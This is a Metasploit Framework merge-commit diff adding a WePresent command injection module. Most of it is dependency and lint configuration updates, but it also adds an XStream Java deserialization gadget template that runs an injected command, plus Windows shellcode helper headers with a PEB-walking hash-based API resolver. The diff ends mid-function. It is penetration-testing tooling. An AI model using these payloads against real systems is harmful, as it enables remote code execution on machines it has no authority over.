automatic module_metadata_base.json update

Land #12801 , add WePresent cmd injection module
2020-01-14 11:05:41 -06:00 · 2020-01-14 09:25:15 -06:00 · 2020-01-14 09:25:15 -06:00 · 2020-01-14 09:25:15 -06:00 · 2020-01-14 09:25:14 -06:00 · 2020-01-13 20:32:15 -06:00
193 changed files with 11082 additions and 1665 deletions
@@ -25,6 +25,7 @@ pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
@@ -112,7 +112,7 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:            
  Enabled: true
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2
@@ -126,7 +126,7 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/AlignHash:
+Layout/HashAlignment:
  Enabled: false
  Description: 'aligning info hashes to match these rules is almost impossible to get right'

@@ -142,7 +142,7 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/AlignParameters:
+Layout/ParameterAlignment:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
@@ -40,7 +40,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -27,9 +27,9 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.17.93)
+    metasploit-framework (4.17.102)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -12,7 +12,10 @@ PATH
      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
+      eventmachine
      faker
+      faraday (<= 0.17.0)
+      faye-websocket
      filesize
      jsobfu
      json
@@ -20,7 +23,7 @@ PATH
      metasploit-concern
      metasploit-credential (< 3.0.0)
      metasploit-model
-      metasploit-payloads (= 1.3.79)
+      metasploit-payloads (= 1.3.83)
      metasploit_data_models (< 3.0.0)
      metasploit_payloads-mettle (= 0.5.16)
      mqtt
@@ -105,14 +108,14 @@ GEM
      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.10.0)
+    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    backports (3.15.0)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    crass (1.0.5)
@@ -122,6 +125,7 @@ GEM
    docile (1.3.2)
    ed25519 (1.2.4)
    erubis (2.7.0)
+    eventmachine (1.2.7)
    factory_girl (4.9.0)
      activesupport (>= 3.0.0)
    factory_girl_rails (4.9.0)
@@ -131,6 +135,9 @@ GEM
      i18n (>= 0.8)
    faraday (0.17.0)
      multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
@@ -138,8 +145,8 @@ GEM
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.2.0)
-    loofah (2.3.1)
+    json (2.3.0)
+    loofah (2.4.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    metasm (1.0.4)
@@ -160,7 +167,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.79)
+    metasploit-payloads (1.3.83)
    metasploit_data_models (2.0.17)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -182,9 +189,10 @@ GEM
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.5)
+    nokogiri (1.10.7)
      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
@@ -192,7 +200,7 @@ GEM
      pcaprub
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.3.0)
+    pdf-reader (2.4.0)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
@@ -207,8 +215,8 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (4.0.1)
-    rack (1.6.11)
+    public_suffix (4.0.3)
+    rack (1.6.12)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
@@ -224,9 +232,9 @@ GEM
      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (13.0.0)
+    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.5)
+    recog (2.3.6)
      nokogiri
    redcarpet (3.5.0)
    rex-arch (0.1.13)
@@ -255,7 +263,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.82)
+    rex-powershell (0.1.83)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -265,7 +273,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.20)
+    rex-socket (0.1.21)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -280,12 +288,12 @@ GEM
      rspec-core (~> 3.9.0)
      rspec-expectations (~> 3.9.0)
      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.0)
-      rspec-support (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
    rspec-expectations (3.9.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.0)
+    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
    rspec-rails (3.9.0)
@@ -298,7 +306,7 @@ GEM
      rspec-support (~> 3.9.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.9.0)
+    rspec-support (3.9.2)
    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.1.0)
@@ -317,20 +325,23 @@ GEM
    simplecov-html (0.10.2)
    sqlite3 (1.3.13)
    sshkey (2.0.0)
-    thor (0.20.3)
+    thor (1.0.1)
    thread_safe (0.3.6)
    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.1)
+    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
    windows_error (0.1.2)
    xdr (2.0.0)
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)

 PLATFORMS
  ruby
@@ -8,13 +8,13 @@ activesupport, 4.2.11.1, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.10.0, MIT
+arel-helpers, 2.11.0, MIT
 backports, 3.15.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
@@ -24,23 +24,25 @@ dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 erubis, 2.7.0, MIT
+eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_girl, 4.9.0, MIT
 factory_girl_rails, 4.9.0, MIT
 faker, 2.2.1, MIT
 faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
 i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
-loofah, 2.3.1, MIT
+json, 2.3.0, ruby
+loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 2.0.14, "New BSD"
-metasploit-framework, 4.17.93, "New BSD"
+metasploit-framework, 4.17.102, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.79, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 2.0.17, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
@@ -53,28 +55,28 @@ nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.5, MIT
-octokit, 4.14.0, MIT
+nokogiri, 1.10.7, MIT
+octokit, 4.15.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.3.0, MIT
+pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 4.0.1, MIT
-rack, 1.6.11, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.12, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
-rake, 13.0.0, MIT
+rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.5, unknown
+recog, 2.3.6, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -85,23 +87,23 @@ rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.82, "New BSD"
+rex-powershell, 0.1.83, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.20, "New BSD"
+rex-socket, 0.1.21, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
 rspec-expectations, 3.9.0, MIT
-rspec-mocks, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
 rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.0, MIT
+rspec-support, 3.9.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
@@ -112,13 +114,15 @@ simplecov, 0.17.1, MIT
 simplecov-html, 0.10.2, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
+ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT
@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}
@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif
@@ -0,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
